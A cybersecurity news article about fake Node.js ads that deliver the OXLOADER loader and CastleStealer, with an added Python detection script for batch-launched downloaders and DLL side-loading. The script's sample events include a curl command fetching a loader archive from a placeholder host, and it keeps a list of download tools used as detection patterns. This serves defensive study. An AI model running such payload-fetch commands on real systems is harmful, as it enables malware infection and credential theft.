Fake Node.js Ads Push New OXLOADER Malware to Deploy CastleStealer

A new malvertising campaign uses fake Google ads and a stealthy loader called OXLOADER to quietly deliver CastleStealer through heavily obfuscated, multi-stage infection chains.

CSBadmin
2 Min Read

Cybersecurity researchers have uncovered a new malware campaign that uses fraudulent Google advertisements to distribute a previously undocumented loader known as OXLOADER, which ultimately delivers the CastleStealer information-stealing malware. The operation begins when users search for software such as Node.js and are redirected through malicious ads to convincing lookalike websites designed to trick them into downloading infected files.

Victims who interact with the fake sites receive a malicious batch script hosted on the decentralized cloud storage platform Storj. While presenting a legitimate-looking installation wizard, the script quietly downloads and executes OXLOADER, which then uses DLL side-loading and multiple layers of obfuscation to evade detection and launch the final CastleStealer payload.
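The two behaviours described above, a batch script that fetches and runs a loader, and a DLL side-loaded next to a legitimate executable, are both visible in endpoint telemetry. The following is an added example (not code from the article or the researchers) of a small detection pass over process-creation and image-load events. The event field names, the directory list, and the sample events are constructed for illustration and are simplified relative to any real EDR or Sysmon schema; the download URL is a placeholder.

```python
"""Heuristic detection for a cmd.exe-launched downloader and for DLL
side-loading from a user-writable directory. Added example; event shapes
and the sample events are constructed and simplified, not real telemetry."""
import re
from dataclasses import dataclass

# Directories an unprivileged user can write to; a DLL loaded from one of
# these next to a signed binary is the classic side-loading pattern.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\downloads\\", "\\public\\")
# Built-in tools commonly driven from a batch script to fetch a payload.
DOWNLOAD_TOOLS = ("curl", "certutil", "bitsadmin", "powershell", "pwsh", "wget")
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


@dataclass
class Alert:
    rule: str
    detail: str


def is_user_writable(path: str) -> bool:
    return any(seg in path.lower() for seg in USER_WRITABLE)


def check_process(ev: dict) -> list[Alert]:
    """Flag a download utility spawned by cmd.exe (i.e. from a batch script)
    whose command line carries a URL."""
    parent = ev.get("ParentImage", "").lower()
    image = ev.get("Image", "").lower()
    if not parent.endswith("\\cmd.exe"):
        return []
    if not any(tool in image for tool in DOWNLOAD_TOOLS):
        return []
    match = URL_RE.search(ev.get("CommandLine", ""))
    if not match:
        return []
    return [Alert("batch_downloader", f"{image} fetched {match.group(0)} under cmd.exe")]


def check_image_load(ev: dict) -> list[Alert]:
    """Flag an unsigned DLL loaded from a user-writable directory by a signed
    executable that lives in the same directory (side-loading pattern).
    'ProcessSigned' / 'ImageSigned' are constructed field names."""
    proc = ev.get("Image", "")
    dll = ev.get("ImageLoaded", "")
    if not dll.lower().endswith(".dll") or not is_user_writable(dll):
        return []
    same_dir = proc.rsplit("\\", 1)[0].lower() == dll.rsplit("\\", 1)[0].lower()
    if same_dir and ev.get("ProcessSigned") == "true" and ev.get("ImageSigned") == "false":
        return [Alert("dll_sideload", f"{proc} loaded unsigned {dll} from its own directory")]
    return []


def scan(events: list[dict]) -> list[Alert]:
    alerts: list[Alert] = []
    for ev in events:
        if ev.get("EventType") == "ProcessCreate":
            alerts += check_process(ev)
        elif ev.get("EventType") == "ImageLoad":
            alerts += check_image_load(ev)
    return alerts


# Constructed sample events: one benign and one suspicious of each type.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate",
     "Image": "C:\\Windows\\System32\\curl.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "curl.exe -o C:\\Users\\u\\AppData\\Local\\Temp\\setup.zip "
                    "https://storage.example/loader.zip"},  # placeholder URL
    {"EventType": "ProcessCreate",
     "Image": "C:\\Windows\\System32\\msiexec.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "msiexec.exe /i C:\\Users\\u\\Downloads\\tool.msi"},
    {"EventType": "ImageLoad",
     "Image": "C:\\Users\\u\\AppData\\Local\\Temp\\node-setup\\installer.exe",
     "ImageLoaded": "C:\\Users\\u\\AppData\\Local\\Temp\\node-setup\\helper.dll",
     "ProcessSigned": "true", "ImageSigned": "false"},
    {"EventType": "ImageLoad",
     "Image": "C:\\Program Files\\App\\app.exe",
     "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll",
     "ProcessSigned": "true", "ImageSigned": "true"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.detail}")
```

Both rules are deliberately coarse: a signed installer legitimately loading a helper DLL from its own extraction folder will also trip the side-load rule, so in practice the hits are correlated (same process tree, short time window, newly created directory) rather than alerted on individually.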

Researchers found that OXLOADER incorporates advanced anti-analysis features, including self-modifying code, anti-virtual machine checks, and complex code obfuscation techniques that make it difficult for security tools to identify. The malware also avoids infecting systems located in Commonwealth of Independent States (CIS) countries, a tactic commonly associated with financially motivated Russian-speaking cybercriminals.

Although still in its early stages, OXLOADER demonstrates a level of sophistication that has caught researchers’ attention. Its low detection rates, use of trusted cloud services, and carefully engineered evasion mechanisms give threat actors a valuable window to steal credentials, browser data, cryptocurrency wallets, and other sensitive information before security products can respond.


Sources: The Hacker News